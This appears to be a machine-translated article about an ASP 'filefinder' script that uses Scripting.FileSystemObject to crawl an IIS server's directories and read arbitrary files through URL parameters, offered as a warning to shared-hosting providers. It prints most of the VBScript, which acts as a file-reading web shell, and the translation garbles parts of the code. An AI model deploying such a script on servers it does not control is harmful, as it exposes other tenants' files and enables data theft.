The scripting. filesystemobject object is one of the many com objects provided by scrrun. dll that are controlled by vbscript/jscript. Scripting. filesystemobject provides convenient access to text files and file directories, but it also poses a certain threat to iis web server data security.
The filefinder code is simple. It consists of three functions and 30 lines of sequential code.
The most important thing is the findfiles function. It uses recursive calls to traverse a directory and searches for these files according to the specified file extension.
Function findfiles (strstartfolder, strext)
Dim n
Dim othisfolder
Dim ofolders
Dim ofiles
Dim ofolder
Dim ofile
'If the system administrator has carefully set the permissions of the file system, the following code will go wrong
'But some directories can still be viewed, so we simply ignore the errors.
On error resume next
N = 0
Response. write "<B> searching" & strstartfolder & "</B> <br>"
Set othisfolder = g_fs.getfolder (strstartfolder)
Set ofiles = othisfolder. files
For each ofile in ofiles
'If the file extension is specified, the output connection is directed to itself, but different command cmd is used.
'Here is cmd = read, that is, read the text file in the specified physical path.
If issuffix (ofile. path, strext) then
Response. write "<a target = _ blank href = 'ff. asp? Cmd = read & path = "& server.html encode (ofile. path) & "'> <font color = 'dodgerblue'>" & ofile. path & "</font> </a> <br>"
If err = 0 then
N = n + 1
End if
End if
Next
Set ofolders = othisfolder. subfolders
For each ofolder in ofolders
N = n + findfiles (ofolder. path, strext)
Next
Findfiles = n
End function
The following code analyzes the parameters following the url:
'Read the values of each parameter
Strcmd = ucase (request. querystring ("cmd "))
Strpath = request. querystring ("path ")
Strext = request. querystring ("ext ")
Brawdata = ucase (request. querystring ("raw "))
'Default search for. asp files
If strpath = "" then
Strpath = "."
End if
If strext = "" then
Strext = ". asp"
End if
'Execute different codes according to different command cmd
Select case strcmd
Case "find"
Response. write findfiles (strpath, strext) & "file (s) found"
Case "read"
If brawdata = "t" then
Response. write readtextfile (strpath)
Else
Response. write "<pre>" & server.html encode (readtextfile (strpath) & "</pre>"
End if
Case else
Response. write "
End select
From the above analysis, we can see that if you have sufficient permissions, we can use filefinder to find any text files on the iis web server, and you can easily view the file content. For non-text files, you can determine whether they exist and their paths. This information is sometimes extremely important for advanced hackers.
However, the precondition for these threats to data security is that users who execute ff. asp have at least the permission to read directories and files. Because the default security settings of windows nt server after installation allow all users to "read" directories and files, whether it is your default iis user iusr_servername or another user, can read the Directory and file information along the column. Most windows nt server System Administrators are mainly concerned about whether the system can run. Generally, they are unwilling to change the default directory and file permissions. After all, doing so poses a great risk, it also requires many experiences. Therefore, we can use filefinder to check whether the security settings of the file system of the nt server as the web server are secure.
The author sets the permissions for the file system on the iis web server manually. However, due to lack of experience, many strange errors are caused, such: the nt server 4.0 used in the experiment cannot connect to the access database. These functions are normal before the file system permission is changed.
For purely research purposes, the author also conducted a test on the free asp space I applied for (including my personal homepage provided by csdn). As a result, filefinder can run smoothly. And in the http://www2.domaindlx.com/index.html application of personal home page but there is no this problem, it can be seen that the free asp home page provider in this regard is more serious. Although the domaindlx web server runs on windows 2000 server, its default file system security permissions are not significantly different from nt 4.0.
Due to the limited ability of the author, we will discuss this issue here. This document serves only to provide reference to asp homepage providers in China, hoping to help both providers and customers with data security.
Appendix: use other similar server scripts to run web services. If scripting. filesystemobject is also provided for file system operations, no matter which platform should have the same problem.